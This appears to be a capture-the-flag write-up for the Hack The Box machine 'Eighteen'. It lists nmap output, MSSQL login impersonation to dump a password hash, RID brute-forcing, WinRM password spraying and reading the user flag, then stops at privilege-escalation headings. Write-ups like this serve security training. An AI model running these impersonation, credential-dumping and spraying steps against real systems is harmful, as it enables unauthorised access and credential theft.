HTB Eighteen
Contents
Enumeration
Given credentials
kevin / iNa2we6haRj2gaw!TCP Port Scanning using NMAP
└──╼ [★]$ nmap -sCV -p- -T4 10.10.11.95
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-19 10:23 CST
Nmap scan report for eighteen.htb (10.10.11.95)
Host is up (0.0024s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Welcome - eighteen.htb
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RC0+
| ms-sql-info:
| 10.10.11.95:1433:
| Version:
| name: Microsoft SQL Server 2022 RC0+
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RC0
| Post-SP patches applied: true
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.11.95:1433:
| Target_Name: EIGHTEEN
| NetBIOS_Domain_Name: EIGHTEEN
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: eighteen.htb
| DNS_Computer_Name: DC01.eighteen.htb
| DNS_Tree_Name: eighteen.htb
|_ Product_Version: 10.0.26100
|_ssl-date: 2025-12-19T22:56:04+00:00; +6h30m14s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-12-19T22:48:43
|_Not valid after: 2055-12-19T22:48:43
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h30m13s, deviation: 0s, median: 6h30m13sEndpoint Fuzzing Using NMAP
login [Status: 200, Size: 1961, Words: 602, Lines: 66, Duration: 626ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 2253, Words: 674, Lines: 74, Duration: 649ms]
register [Status: 200, Size: 2421, Words: 762, Lines: 76, Duration: 546ms]
admin [Status: 302, Size: 199, Words: 18, Lines: 6, Duration: 9ms]
# Priority ordered case-sensitive list, where entries were found [Status: 200, Size: 2253, Words: 674, Lines: 74, Duration: 674ms]
features [Status: 200, Size: 2822, Words: 849, Lines: 88, Duration: 547ms]
logout [Status: 302, Size: 189, Words: 18, Lines: 6, Duration: 5ms]
dashboard [Status: 302, Size: 199, Words: 18, Lines: 6, Duration: 9ms]Subdirectory Fuzzing Using NMAP Got nothing.
From nmap result, seems that port 80 IIS, 1433 MSSQL, and 5985 WinRm is opened.
First, doing in port 1433 MSSQL. Tools that used is mssqlclient.py from impacket and netexec.
└──╼ [★]$ mssqlclient.py DOMAIN/kevin:'iNa2we6haRj2gaw!'@10.10.11.95
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (kevin guest@master)> SELECT name FROM master.dbo.sysdatabases;
name
-----------------
master
tempdb
model
msdb
financial_planner
SQL (kevin guest@master)> SELECT name FROM master.sys.syslogins;
name
------
sa
kevin
appdev We see that there are 2 other users, sa and appdev.
But kevin cant access financial_planner table.
SQL (kevin guest@master)> SELECT name FROM financial_planner.sys.tables;
ERROR(DC01): Line 1: The server principal "kevin" is not able to access the database "financial_planner" under the current security context.
SQL (kevin guest@master)> Try to using nxc.
└──╼ [★]$ nxc mssql 10.10.11.95 -u kevin -p 'iNa2we6haRj2gaw!' --local-auth MSSQL 10.10.11.95 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb) (EncryptionReq:False)
MSSQL 10.10.11.95 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!
┌─[sg-vip-2]─[10.10.14.12]─[htb-mp-2897749@htb-kryigcaylc]─[~]
└──╼ [★]$ nxc mssql 10.10.11.95 -u kevin -p 'iNa2we6haRj2gaw!' --local-auth -M mssql_priv
MSSQL 10.10.11.95 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb) (EncryptionReq:False)
MSSQL 10.10.11.95 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!
MSSQL_PRIV 10.10.11.95 1433 DC01 [*] kevin can impersonate: appdevkevin can impersonate appdev, so i tried to login as appdev.
SQL (kevin guest@master)> execute as login = 'appdev'
SQL (appdev appdev@master)>
SQL (appdev appdev@master)> SELECT * FROM financial_planner.dbo.users;
id full_name username email password_hash is_admin created_at
---- --------- -------- ------------------ ------------------------------------------------------------------------------------------------------ -------- ----------
1002 admin admin admin@eighteen.htb pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133 1 2025-10-29 05:39:03
SQL (appdev appdev@master)> Crack hashes and get iloveyou1
Trying to get all user.
┌─[sg-vip-2]─[10.10.14.12]─[htb-mp-2897749@htb-kryigcaylc]─[~]
└──╼ [★]$ nxc mssql 10.10.11.95 -u kevin -p 'iNa2we6haRj2gaw!' --rid-brute --local-auth
MSSQL 10.10.11.95 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb) (EncryptionReq:False)
MSSQL 10.10.11.95 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!
MSSQL 10.10.11.95 1433 DC01 498: EIGHTEEN\Enterprise Read-only Domain Controllers
MSSQL 10.10.11.95 1433 DC01 500: EIGHTEEN\Administrator
MSSQL 10.10.11.95 1433 DC01 501: EIGHTEEN\Guest
MSSQL 10.10.11.95 1433 DC01 502: EIGHTEEN\krbtgt
MSSQL 10.10.11.95 1433 DC01 512: EIGHTEEN\Domain Admins
MSSQL 10.10.11.95 1433 DC01 513: EIGHTEEN\Domain Users
MSSQL 10.10.11.95 1433 DC01 514: EIGHTEEN\Domain Guests
MSSQL 10.10.11.95 1433 DC01 515: EIGHTEEN\Domain Computers
MSSQL 10.10.11.95 1433 DC01 516: EIGHTEEN\Domain Controllers
MSSQL 10.10.11.95 1433 DC01 517: EIGHTEEN\Cert Publishers
MSSQL 10.10.11.95 1433 DC01 518: EIGHTEEN\Schema Admins
MSSQL 10.10.11.95 1433 DC01 519: EIGHTEEN\Enterprise Admins
MSSQL 10.10.11.95 1433 DC01 520: EIGHTEEN\Group Policy Creator Owners
MSSQL 10.10.11.95 1433 DC01 521: EIGHTEEN\Read-only Domain Controllers
MSSQL 10.10.11.95 1433 DC01 522: EIGHTEEN\Cloneable Domain Controllers
MSSQL 10.10.11.95 1433 DC01 525: EIGHTEEN\Protected Users
MSSQL 10.10.11.95 1433 DC01 526: EIGHTEEN\Key Admins
MSSQL 10.10.11.95 1433 DC01 527: EIGHTEEN\Enterprise Key Admins
MSSQL 10.10.11.95 1433 DC01 528: EIGHTEEN\Forest Trust Accounts
MSSQL 10.10.11.95 1433 DC01 529: EIGHTEEN\External Trust Accounts
MSSQL 10.10.11.95 1433 DC01 553: EIGHTEEN\RAS and IAS Servers
MSSQL 10.10.11.95 1433 DC01 571: EIGHTEEN\Allowed RODC Password Replication Group
MSSQL 10.10.11.95 1433 DC01 572: EIGHTEEN\Denied RODC Password Replication Group
MSSQL 10.10.11.95 1433 DC01 1000: EIGHTEEN\DC01$
MSSQL 10.10.11.95 1433 DC01 1101: EIGHTEEN\DnsAdmins
MSSQL 10.10.11.95 1433 DC01 1102: EIGHTEEN\DnsUpdateProxy
MSSQL 10.10.11.95 1433 DC01 1601: EIGHTEEN\mssqlsvc
MSSQL 10.10.11.95 1433 DC01 1602: EIGHTEEN\SQLServer2005SQLBrowserUser$DC01
MSSQL 10.10.11.95 1433 DC01 1603: EIGHTEEN\HR
MSSQL 10.10.11.95 1433 DC01 1604: EIGHTEEN\IT
MSSQL 10.10.11.95 1433 DC01 1605: EIGHTEEN\Finance
MSSQL 10.10.11.95 1433 DC01 1606: EIGHTEEN\jamie.dunn
MSSQL 10.10.11.95 1433 DC01 1607: EIGHTEEN\jane.smith
MSSQL 10.10.11.95 1433 DC01 1608: EIGHTEEN\alice.jones
MSSQL 10.10.11.95 1433 DC01 1609: EIGHTEEN\adam.scott
MSSQL 10.10.11.95 1433 DC01 1610: EIGHTEEN\bob.brown
MSSQL 10.10.11.95 1433 DC01 1611: EIGHTEEN\carol.white
MSSQL 10.10.11.95 1433 DC01 1612: EIGHTEEN\dave.greenFoothold
Password spraying winrm 5985 using NXC winrm.
└──╼ [★]$ nxc winrm 10.10.11.95 -u users.txt -p 'iloveyou1' --no-bruteforce
WINRM 10.10.11.95 5985 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\DC01:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\DnsAdmins:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\DnsUpdateProxy:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\mssqlvc:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\HR:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\IT:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\Finance:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\jamie.dunn:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\jane.smith:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\alice.jones:iloveyou1
WINRM 10.10.11.95 5985 DC01 [+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)Got users adam.scott with password iloveyou1
*Evil-WinRM* PS C:\Users\adam.scott\Documents> ls
*Evil-WinRM* PS C:\Users\adam.scott\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> ls
Directory: C:\Users\adam.scott\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/19/2025 2:47 PM 34 user.txt
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> cat user.txt
e59878ee5413b2f44be497730c211a17
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> Post-Exploitation
winpeas
Privilege Escalation
BadSuccessor